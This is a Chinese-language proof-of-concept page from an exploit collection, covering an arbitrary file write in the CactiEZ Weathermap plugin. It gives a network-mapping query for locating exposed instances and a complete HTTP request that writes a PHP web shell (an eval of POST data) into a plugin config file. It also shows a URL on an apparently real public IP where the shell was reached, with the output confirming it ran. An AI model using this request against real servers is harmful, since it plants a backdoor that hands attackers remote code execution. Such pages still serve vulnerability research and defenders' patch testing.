admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/CactiEZ weathermap 插件任意文件写入漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

55 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# CactiEZ weathermap 插件任意文件写入漏洞
## 漏洞描述
CactiEZ 中文版是 Cacti 中文解决方案,整合了 SpineRRDTool 和美化字体。集成 TholdMonitorSyslogWeathermapRealtimeErrorimageMobileAggregate 以及 ApacheSquidF5NginxMySQL 等模板。
CactiEZ Weathermap 插件存在任意文件写入漏洞。
## 披露时间
```
wooyun-2016-0178509
```
## 漏洞影响
```
CactiEZ Weathermap 插件
```
## 网络测绘
```
app="Cactiez"
```
## 漏洞复现
登录页面
![](images/CactiEZ%20weathermap%20插件任意文件写入漏洞/image-20240904155412309.png)
poc
```
GET /plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php%20echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: */*
Cookie: Cacti=xxx
```
```
http://114.242.111.210:8088/plugins/weathermap/configs/test.php
```
回显 md5 值:
```
# echo(md5(1));
c4ca4238a0b923820dcc509a6f75849b
```
![](images/CactiEZ%20weathermap%20插件任意文件写入漏洞/image-20240904154426936.png)
Reference in New Issue View Git Blame Copy Permalink